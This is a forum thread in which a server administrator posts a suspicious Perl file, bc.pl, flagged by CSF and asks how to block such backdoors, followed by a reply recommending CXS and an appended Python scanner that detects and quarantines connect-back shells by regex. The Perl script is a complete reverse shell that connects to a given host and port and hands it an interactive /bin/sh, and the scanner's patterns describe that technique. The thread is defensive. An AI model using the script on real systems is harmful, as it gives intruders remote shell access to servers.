I have got an alert from CSF regarding a suspicious file bc.pl on the server with the following content.
#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);
This gives direct access to the shell of the server. Can someone suggest how I can stop such a backdoor connect script from working, rather than checking an alert and manually deleting the file every time I get one?
Please help with some suggestions to block this kind of hacking attack.
Thank you!
Block certain suspicious files
Re: Block certain suspicious files
Using CXS is the best way of blocking this. CXS checks every file uploaded to the server and deletes the file on the fly.
Sergio
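As an added example (not from this thread, and not CXS's own code), here is a small Python scanner that shows the kind of content check an upload scanner performs on a script like bc.pl: a file is flagged only when it combines a TCP connect-back, redirection of STDIN/STDOUT/STDERR onto the socket, and spawning /bin/sh, so ordinary Perl network clients that merely use Socket are not flagged. The indicator names, the quarantine directory and the sample snippets are constructed for the example.

```python
import os
import re
import shutil

# Each indicator class alone is benign (plenty of legitimate Perl uses Socket).
# The co-occurrence of all three is the connect-back shell pattern seen in bc.pl.
INDICATORS = {
    "socket_connect": re.compile(r"\b(inet_aton|sockaddr_in|connect\s*\()"),
    "std_redirect": re.compile(r"open\s*\(\s*STD(IN|OUT|ERR)\s*,\s*['\"]>&"),
    "spawn_shell": re.compile(r"\b(system|exec)\s*\(\s*['\"]/bin/(ba)?sh\b"),
}

def score_content(content: str) -> dict:
    """Report which indicator classes are present in a script's text."""
    return {name: bool(pat.search(content)) for name, pat in INDICATORS.items()}

def is_connect_back_shell(content: str) -> bool:
    """Flag only when every class co-occurs, to keep false positives low."""
    return all(score_content(content).values())

def quarantine(path: str, qdir: str = "/var/quarantine") -> str:
    """Move a flagged file out of the web tree and strip its permissions.
    Quarantining (rather than deleting on the fly) keeps the sample for forensics."""
    os.makedirs(qdir, mode=0o700, exist_ok=True)
    dest = os.path.join(qdir, os.path.basename(path) + ".quarantined")
    shutil.move(path, dest)
    os.chmod(dest, 0o000)
    return dest

def scan_paths(paths):
    """Yield the paths whose content matches the backdoor pattern; skip unreadable files."""
    for p in paths:
        try:
            with open(p, "r", errors="replace") as fh:
                if is_connect_back_shell(fh.read()):
                    yield p
        except OSError:
            continue

# Constructed sample inputs: the key lines of the thread's bc.pl, and a benign SMTP client.
BACKDOOR_SNIPPET = (
    "use Socket;\n$paddr=sockaddr_in($ARGV[1], $iaddr);\n"
    "open(STDIN, \">&SOCKET\");\nopen(STDOUT, \">&SOCKET\");\nsystem('/bin/sh -i');\n"
)
BENIGN_SNIPPET = (
    "use Socket;\n$paddr=sockaddr_in(25, inet_aton('127.0.0.1'));\n"
    "connect(SOCKET, $paddr) || die;\nprint SOCKET \"HELO example\\r\\n\";\n"
)
```

Hook `scan_paths` into whatever triggers on new uploads (an upload handler, inotify, or a cron sweep of the document root) and hand each flagged path to `quarantine`.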